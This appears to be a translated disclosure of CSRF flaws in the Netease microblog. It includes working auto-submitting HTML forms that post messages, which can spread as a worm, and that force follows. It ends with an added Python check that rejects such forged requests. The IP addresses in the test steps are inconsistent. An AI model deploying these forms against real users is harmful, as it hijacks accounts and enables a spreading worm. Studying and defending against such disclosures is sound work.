No token validation is performed, so the site is vulnerable to CSRF attacks
An attacker can construct a malicious form and trick a victim into clicking a link to it. When the victim clicks the link, a microblog message is posted on the victim's behalf. This method can produce a worm, which is very serious.
Test method:
1. Save the following form as index.html and put it in a local directory, replacing 183.174.39.46 with your own IP.
<form name="CSRF" method="POST" action="http://t.163.com:80/statuses/update.do">
  <input type="hidden" name="status" value="http://22.214.171.124/index.html"/>
  <input type="hidden" name="in_reply_to_status_id" value="sendinfo"/>
  <input type="hidden" name="dispatchToFollowers" value=""/>
</form>
<script>
  document.CSRF.submit();
</script>
2. Log in to Netease microblogging, then visit http://126.96.36.199/index.html
3. Go back to your own page, http://t.163.com/, and you will find that one more microblog message has been posted.
4. If the people who follow you click on that message, they will post a similar microblog message.
Second, Netease microblogging CSRF exploit 2: automatically follow a user, and automatically post
Yesterday I took the problem to be too simple, and today I tried it: this Netease microblogging CSRF vulnerability can also be used to automatically follow a user. Combined with yesterday's auto-post function, the two together will be a very interesting thing. This issue is too serious, and I could not help thinking of sending it out as a 0day, but in view of National Day, you think about it and you feel good.
After logging in, visiting the constructed form makes you follow "small pan head".
<form method="POST" name="CSRF" action="http://t.163.com:80/friendships/create/3198225089.json">
  <input type="hidden" name="name" value="value"/>
</form>
<script>
  document.CSRF.submit();
</script>
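A server-side check that would reject both forged forms above, as an added example that is not part of the original post and not Netease's code: a state-changing POST must come from the site's own origin and carry a token bound to the victim's session. The `csrf_token` field name, the server key, the session ids and the `attacker.example` origin are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)   # assumed per-deployment secret
TRUSTED_HOSTS = {"t.163.com"}          # host taken from the page's form actions
PROTECTED = ("/statuses/update.do", "/friendships/create/")  # paths from the page


def issue_token(session_id: str) -> str:
    """Token bound to one session; embedded as a hidden field in genuine forms."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def token_valid(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, _, sig = (token or "").partition(".")
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return bool(nonce) and hmac.compare_digest(sig.encode(), expected.hexdigest().encode())


def origin_trusted(headers: dict) -> bool:
    """Strict policy: Origin (or Referer as fallback) must name our own host."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    return urlsplit(source).hostname in TRUSTED_HOSTS


def check_request(method, path, headers, session_id, form):
    """Return (status, reason); the session cookie is assumed to be valid already."""
    if method != "POST" or not path.startswith(PROTECTED):
        return 200, "not a protected state change"
    if not origin_trusted(headers):
        return 403, "cross-site origin"
    if not token_valid(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, "ok"


if __name__ == "__main__":
    sid = "session-A"                                    # constructed session id
    forged = {"status": "x", "in_reply_to_status_id": "sendinfo"}  # constructed
    print(check_request("POST", "/statuses/update.do",
                        {"Origin": "http://attacker.example"}, sid, forged))
    genuine = dict(forged, csrf_token=issue_token(sid))
    print(check_request("POST", "/statuses/update.do",
                        {"Origin": "http://t.163.com"}, sid, genuine))
```

The browser attaches the victim's cookie to the cross-site POST automatically, which is why the cookie alone proves nothing; the token cannot be read or guessed by a page on another origin.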